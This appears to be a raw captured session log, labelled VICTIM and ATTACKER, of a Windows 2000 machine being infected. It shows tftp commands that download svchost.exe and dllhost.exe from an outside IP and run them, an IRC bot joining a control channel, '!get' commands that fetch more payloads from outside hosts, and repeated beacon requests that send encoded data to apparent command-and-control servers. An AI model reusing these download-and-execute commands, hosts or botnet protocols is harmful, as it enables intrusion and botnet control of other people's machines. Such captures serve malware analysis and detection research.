VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
Volume Serial Number is F07B-A028
Directory of C:\\WINNT\\system32\\wins
File Not Found
C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
Volume Serial Number is F07B-A028
Directory of C:\\WINNT\\system32\\dllcache
File Not Found
C:\\WINNT\\system32>
VICTIM: tftp -i 175.123.78.131 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: Transfer successful: 54544 bytes in 23 seconds, 2371 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 175.123.78.131 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 8 seconds, 2496 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK nyuwspwo
USER c020500 . . :-
VICTIM: Service Pack 2
JOIN &virtu
ATTACKER: :u. PRIVMSG nyuwspwo :!get http:/88.perfectexe.com:88/kp.jpg
:u. PRIVMSG nyuwspwo :!get http:/kakzhe.com/ml2.txt
VICTIM: GET /kp.jpg HTTP/1.0
User-Agent: Download
Host: 88.perfectexe.com:88
Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.9644739 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /ck.jpg?t=0.728512 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: 88.perfectexe.com:88
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /sn.php?c=918F799D4DDD1ABC0C169AB27438498ED11D96FEDDC234AADEED4403974DFCD2E1AA677EE5A42B1F4D2B78E5EED49778AE57A71BB6C589DD390F1CB64DE51F6CA8D582274642EF70457FC6BC6B85ED3244B31C21AFD18F8955F74429648E2F567A2B0B1AAF8FB01F16A51493383864FE47B0D8F726612D0A762FEC834AFCE35D2D28822E9AACF64928123364E22455D4&t=0.7777674 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /sn.php?c=CBD59C78F161892F283284AC793575B21DD1C0A8B8A71C823E0D602712C8A38D2962594034755367197FCD504A70F718B8418D31720185D13503DC7671D9017297EA76D3A5A19F00516BD1AB3BD528F716E1A39EA2DC9E98EE4CA4C940AA235A8ADB9584634317B8D46781177A838109CB3E431D85D6B0828E9A483DCA6821DBB6A69733CAFFA462E9D00E5673B4BBC5AC77&t=0.5372888 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-76-27-7E&Publicer=100 HTTP/1.0
User-Agent: CA 0.0.0.2
Host: ck.nucleardiscover.com:88
ATTACKER: GET /s5.jpg?t=0.8635218 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: 88.perfectexe.com:88
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /sn.php?c=445A31D570E08F27D0C8A5FC07702DDF099EFDCB39192DBB8CBE2E67B319D4FA94DE5BB6A19BF0C3CCF65338221E776E61965AB0F98D6B395A622C5B8528006B2C633F97F327019E89B34933B25C70AF7A8D023F27596C6AAD0F2B46A34958211041CFDE92B23A959E2DC94EF4F461FB798E86A912554B6C3A630C6369DFC57B85813B92EBDD54EBE0D8530A67A6D457&t=0.6318323 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /g.php HTTP/1.0
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; waoc)
Host: s5.perfectexe.com:88
Pragma: no-cache
ATTACKER: GET /sn.php?c=F9E741A531A1F65E1B03C1983B4C798BEB7C83B5A5856EF8B5876E2749E398B63B710DE0142E7A49083292F9023E766F01F61CF64A3E36643D053542D5784B2017589F37F521148B81BB502A54BAE23D9A6DBB862A54595F8321513CB45E19606F3E4859E1C19E31FA499B0D4EB765EDBC49520C742751631D09037620824CB66B7B9935241731F6291D54014D8EEA96AB74&t=0.7087976 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET /ck2.jpg?t=9.679812E-02 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: 88.perfectexe.com:88
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: GET / HTTP/1.0
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: touristnetworks.com
Connection: Keep-Alive
ATTACKER: GET /vtrack.php?qry=b38a5345798c4dc4618047987a4f2cd9b3001f7777195a7f5985023cafdd9235a0f968d6aeecdc7275f18296d5c547f0 HTTP/1.0
Accept: */*
Referer: http:/touristnetworks.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: touristnetworks.com
Connection: Keep-Alive
Cookie: GOSESSION=%7C1303854764.36%3A192.168.1.137%2C0; AAA=1
ATTACKER: GET /sn.php?c=756B1DF9DF4F9647EF021D46D2AA25E04AD43205693A24BA3F09B9FAD7010C2A334D1E062F6DB4D570170864C9D821C8B640D037E78A9FBBF2C7384E98E7107C4D315A23DD05851A6852DEA40BE50BD4E611704D700EC7C12C8E711C39D3463F6435EDFC93B30EA1C87BCE49111179E31DEA4F604E09C3E47D24B3DCD36561DF5A50369F3B099453C0F6441D94503F41&t=0.6957361 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
Host: w.nucleardiscover.com:888
Connection: Keep-Alive
Pragma: no-cache
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu